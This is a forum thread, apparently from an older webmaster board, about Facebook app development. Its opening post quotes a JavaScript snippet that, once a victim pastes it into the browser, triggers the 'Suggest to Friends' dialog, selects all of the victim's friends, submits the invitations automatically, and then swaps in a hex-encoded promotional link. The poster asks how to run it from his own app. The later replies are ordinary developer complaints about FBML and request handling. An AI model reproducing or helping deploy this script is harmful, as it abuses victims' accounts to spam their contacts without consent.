next »

[rasputin]

I need some help as to how to be able to do this.

http://www.facebook.com/pages/Tom-Oh/126929663989822?v=app_4949752878&ref=ts

After liking the page, you are presented with some javascript which can be deobfuscated and read clearly to see the javascript code. I dont really understand javascript but some of the simple things that I can see in the code are that I can see where to change it to my own app ids etc.

What else am I missing on my page if I want users to be able to execute this javascript into the browser from my app.

Code:

void(document['getElementById']('app4949752878_dd')['innerHTML'] = '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=126929663989822" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>Suggest to Friends</a>');
var ss = document['getElementById']('suggest');
var c = document['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
void(ss['dispatchEvent'](c));
void(setTimeout(function () {
    fs['select_all']();
}, 3000));
void(setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
}, 4000));
void(setTimeout(function () {
    document['getElementById']('app4949752878_dd')['innerHTML'] = '\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x6f\x75\x74\x75\x62\x65\x2e\x63\x6f\x6d\x2f\x77\x61\x74\x63\x68\x3f\x76\x3d\x49\x30\x58\x50\x70\x32\x6b\x53\x6a\x62\x41\x22\x3e\x4e\x49\x43\x45\x53\x54\x21\x21\x21\x20\x43\x4c\x49\x43\x4b\x20\x48\x45\x52\x45\x20\x54\x4f\x20\x57\x41\x54\x43\x48\x20\x54\x4f\x4d\x2d\x4f\x48\x27\x73\x20\x4e\x45\x57\x20\x4d\x55\x53\x49\x43\x20\x56\x49\x44\x45\x4f\x20\x21\x21\x21\x3c\x2f\x61\x3e\x20';
}, 4500));

from looking at that, does my page need some sort of file attached? what is it.

btw the script invites all friend contacts to the group immediately when executed into the browser.

[nop_90]

javascript on FB is not really JS (from a developers perspective)
http://wiki.developers.facebook.com/index.php/FBJS

[Thurston]

I've tried FBML at my page and it was working with the code. If you are interest to change it, you might be able to try the FBML. This one is easy to connect and add in your page.

[perkiset]

[Phaëton]

Does this mean spam or is there really someone else trying to do a facebook application?

Bring some lube with you before 'allowin ' or 'liking' anything ... ever.

im struggling with some loggin issues on the fb platforms and nobody at the fb  developer forum
can answer me...

your app asks facebook a url... it then can clone it up to 4 times depending on the fbml in the request or
the requesting device or (ALIGNMENT OF THE NEW ZODIAC PERHAPS?) anyhow programming defensively is
almost impossible ... trying to use a UNIQUE ID in my original request but THAT is being duplicated by the FB
platform.

FB Platform then asks my PHP application (hosted on MY SITE) for 1-4 answers (all of which are dynamic and random)
my site sends back the 1-4 answers for the identical request (each dynamic) to the FB PLATFORM SERVERS
The fb platform then picks one of those four answers to ship back to the USER who initially requested the apps.facebook.com/myapp url.
what it does with the other 3 i have no idea. 
Program defensively is best plan.. but how?!?!

so the end result is The USER sees answer 1, 2, 3 or 4 and I have no way of loggin which distinct answer they saw.

its a 'magic 8 ball ' application so it would be nice to know which answer they received of the FOUR generated by my app
and then then one randomly picked by the  FB PLATFORM to actually return to the user...
but no one at FB can help me on this..... generate a unique id in the original request? its duplicated.

my only thought is to java post back to my lamp box if i get an answer and pray that everyone has working java

:wackoff.gif:

There is SOOOO MUCH going on in the middle and no way to program defensively against it unless you rely on some
outside chance that the users device does enough java to send back the page they actually received so you can
track it in your MANY LOGS.

If you can get a FB application to work, the world is your oyster the whole world is on there...


Also if you can get it to work you are a fucking genius.

[isthisthingon]

javascript on FB is not really JS (from a developers perspective)
http://wiki.developers.facebook.com/index.php/FBJS

Just as Visualforce produces unpredictable HTML/Javascript.  It also prepends tenant-specific identifiers to markup which winds up rendering colossal and unreadable viewstates like this: 

Code:

<input type="hidden"  id="com.salesforce.visualforce.ViewState" name="com.salesforce.visualforce.ViewState" value="7WlmYU0h+44QjgdsfKe+KZOE/UR6CmfiBvAz7qhiGJrhiwro/wJw6S8SpHdutYtaRZsOC9FQm3nJmPdSowFRFMhTF+P0zEYIjLzruecrlwlHVulMDCHa7yLiTWH5JEejSyXG2eUI+Jr3C2/30nk48rF9WEpXv0SZNiSdSiuQwRHeJiDTNMXDxjJGL/3b8agK7gn16cghQ9d9lhoBLvoikvIkhxqpOstVZfpbM/UZd/AIMAGGxhhNG1Lh1OnCZa7bd1bmhGE1kJfJJSD94N9WQKvFzMqeY08jqmfjffMeIL6Ow8DlqsgbL7SN5LePg2uS8n0dCUyz0BVqhGCmQQf5Z3O/Eou73Ap394DjWmwCgs1dWHRfdWgps7X0+0eTwASKSZqGqkZPXCdNxj0jYtM0CLS1Vp/MvKpZXR7pZT8+p1lSZ0hc5/QQbTvbLiRURgWWr6ZJzmfPEwnyRJlavkJh08VzrsRlWcP7/eiTHV32Nh69+Kpk/rqOa17CrhfhqGuLzJ+NM5qnxXZ2J+lsZNNHA0P7YJpx2FWfyFNcWDLxSGhZwKYKR4uT38c0ne6cAuPH/iJvhbK7Uu2t8jm/ShCZKf6Qdtr70hMJeFfLmWvq8+EGIdavFCTILbPGfT6AnIWqw9BS9cmVUhhAmz2k1RLN1HYPUK9G36G8oGv1XymIJ9e/xOo1lL/SqyniaywRkboWBmWwUnUMgIIKrzlvklwbUbVJCESPdJjrp/U0Bhna0cv9lzfVEfBLkDHc8kOVaGpUrP2zejvNC2RX5FBj6TtlKvX8vjpFPl0mvECFk0ouAXOOD+D3kzPUVNZg8oZTDyO8lAZZc3moEfQj+KSbtWOnBha/O2vrxZFaAdolpjHe1JA/IXnvPm6HlUMZhuXb.........

What was once just id="theForm" becomes id="j_id0:theForm:leadfeed:j_id365:j_id366:j_id367:j_id368:tb"

Perhaps unrelated but the frustration seems similar 

[nop_90]

I made a FB app with google app engine just for shits and giggles.
This was a while back, but there are/where 2 types of app.
Ones that are in an iframe and FBML

Iframe apps are legacy recomended way is FBML.
Basically here is the sequence of events
1) User requests app (it will be some sort of FB url)
2) FB then proxies the url and passes it along to your server. Inside this "proxy" it runs it thru a translater, turning FBML into HTML and FBJS into JS etc.
3) Your site does its shit and replies back.

http://www.merchantos.com/makebeta/facebook/facebook-php-tutorial/
If I remember correctly the canvas url which you put into the FB config maps to the url in your app.
That is the core of your application